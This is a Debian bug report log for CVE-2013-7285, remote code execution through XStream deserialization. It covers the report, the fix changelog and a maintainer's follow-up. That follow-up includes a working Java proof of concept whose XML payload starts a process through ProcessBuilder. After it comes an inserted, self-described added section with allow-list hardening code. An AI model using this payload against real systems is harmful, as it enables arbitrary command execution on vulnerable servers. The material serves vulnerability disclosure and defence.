libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Related Vulnerabilities: CVE-2013-7285  

Debian Bug report logs - #734821
libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Fri, 10 Jan 2014 02:54:02 UTC

Severity: grave

Tags: security, upstream

Done: Emmanuel Bourg <ebourg@apache.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#734821; Package libxstream-java. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Date: Fri, 10 Jan 2014 03:51:22 +0100
Package: libxstream-java
Severity: grave
Tags: security upstream

Hi,

the following vulnerability was published for libxstream-java.

CVE-2013-7285[0]:
remote code execution via deserialization in XStream

See also [1] for the original report. [3] contains an initial patch
which was committed.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285
    http://security-tracker.debian.org/tracker/CVE-2013-7285
[1] http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
[2] http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3
[3] https://fisheye.codehaus.org/changelog/xstream?cs=2210

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Reply sent to Emmanuel Bourg <ebourg@apache.org>:
You have taken responsibility. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).


Message #10 received at 734821-close@bugs.debian.org (full text, mbox, reply):

From: Emmanuel Bourg <ebourg@apache.org>
To: 734821-close@bugs.debian.org
Subject: Bug#734821: fixed in libxstream-java 1.4.7-1
Date: Wed, 12 Mar 2014 13:33:33 +0000
Source: libxstream-java
Source-Version: 1.4.7-1

We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734821@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Emmanuel Bourg <ebourg@apache.org> (supplier of updated libxstream-java package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
Changed-By: Emmanuel Bourg <ebourg@apache.org>
Description: 
 libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
Changes: 
 libxstream-java (1.4.7-1) unstable; urgency=low
 .
   * New upstream release
     - Fixes CVE-2013-7285 (Closes: #734821)
     - Added a dependency on libjdom2-java
   * Standards-Version updated to 3.9.5 (no changes)
   * Use XZ compression for the upstream tarball
   * Build depend on debhelper >= 9
   * debian/copyright: Updated to the Copyright Format 1.0
Checksums-Sha1: 
 684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
 329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
 243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
 a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
Checksums-Sha256: 
 8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
 33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
 08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
 5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
Files: 
 c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
 09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
 3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
 72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#734821; Package libxstream-java. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).


Acknowledgement sent to Sébastien Delafond <seb@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).


Message #15 received at 734821@bugs.debian.org (full text, mbox, reply):

From: Sébastien Delafond <seb@debian.org>
To: 734821@bugs.debian.org
Cc: control@bugs.debian.org
Subject: 734821
Date: Fri, 10 Oct 2014 11:19:58 +0200
notfixed 734821 1.4.7-1
thanks

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:

  import java.io.IOException;
  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to </pwntester> for the PoC
   * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException   {
          String process = "/usr/bin/xeyes";
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              " <target class=\"java.lang.ProcessBuilder\">" +
              " <command>" +
              " <string>" + process + "</string>" +
              " </command>" +
              " </target>" +
              " <action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
              "</sorted-set>";
          XStream xstream = new XStream(new DomDriver());
          xstream.fromXML(payload);
      }
  }

Cheers,

--Seb
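The PoC above works because XStream, at the affected versions, will instantiate whatever class the XML names, including the `dynamic-proxy` / `java.beans.EventHandler` combination. The defensive counterpart is to make the unmarshaller deny every type that the application did not explicitly expect. The following is an added example, not code from this bug report, from Sébastien, or from the XStream project. It assumes XStream 1.4.7 or later, where the `com.thoughtworks.xstream.security` package (`NoTypePermission`, `NullPermission`, `PrimitiveTypePermission`, `ForbiddenClassException`) and the `allowTypes` / `addPermission` methods exist; `Report` is a hypothetical domain class standing in for whatever the service actually expects.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class HardenedXStreamDemo {

    // Hypothetical domain class: the only object type this service expects to receive.
    public static class Report {
        public String title;
        public int count;
    }

    // Build an XStream instance that refuses every type not on an explicit allow list.
    // Without these calls, XStream 1.4.7 still permits any type by default.
    public static XStream hardenedXStream() {
        XStream xstream = new XStream(new DomDriver());
        xstream.addPermission(NoTypePermission.NONE);              // drop all default permissions
        xstream.addPermission(NullPermission.NULL);                // allow null values
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // allow int, boolean, ...
        xstream.allowTypes(new Class[] { String.class, Report.class });
        xstream.alias("report", Report.class);
        return xstream;
    }

    // Parse untrusted XML. Returns the Report, or null when the document names a type
    // outside the allow list (ForbiddenClassException) or is not a Report at all.
    public static Report parseUntrusted(String xml) {
        try {
            Object obj = hardenedXStream().fromXML(xml);
            return obj instanceof Report ? (Report) obj : null;
        } catch (ForbiddenClassException e) {
            System.err.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed benign input of the expected shape.
        String good = "<report><title>weekly</title><count>3</count></report>";
        Report r = parseUntrusted(good);
        System.out.println("good -> " + (r == null ? "rejected" : r.title + "/" + r.count));

        // Constructed hostile input with the same outer structure as the PoC in this thread
        // (sorted-set wrapping a dynamic-proxy). The handler body is omitted on purpose:
        // the type names alone are enough to trigger ForbiddenClassException, because
        // neither java.util.TreeSet nor any proxy type is on the allow list.
        String bad = "<sorted-set><string>foo</string>"
            + "<dynamic-proxy><interface>java.lang.Comparable</interface>"
            + "<handler class=\"java.beans.EventHandler\"/></dynamic-proxy></sorted-set>";
        System.out.println("bad  -> " + (parseUntrusted(bad) == null ? "rejected" : "ACCEPTED"));
    }
}
```

The ordering matters: `addPermission(NoTypePermission.NONE)` must come first, since it clears the permissive defaults; every later `allowTypes` or `addPermission` call then widens the list deliberately. Checking the whole object graph this way is what stops the chain in the PoC at the first unexpected class, before any `ProcessBuilder` is constructed.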



No longer marked as fixed in versions libxstream-java/1.4.7-1. Request was from Sébastien Delafond <seb@debian.org> to control@bugs.debian.org. (Fri, 10 Oct 2014 09:21:22 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 08 Nov 2014 07:26:44 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:41:24 2019; Machine Name: beach
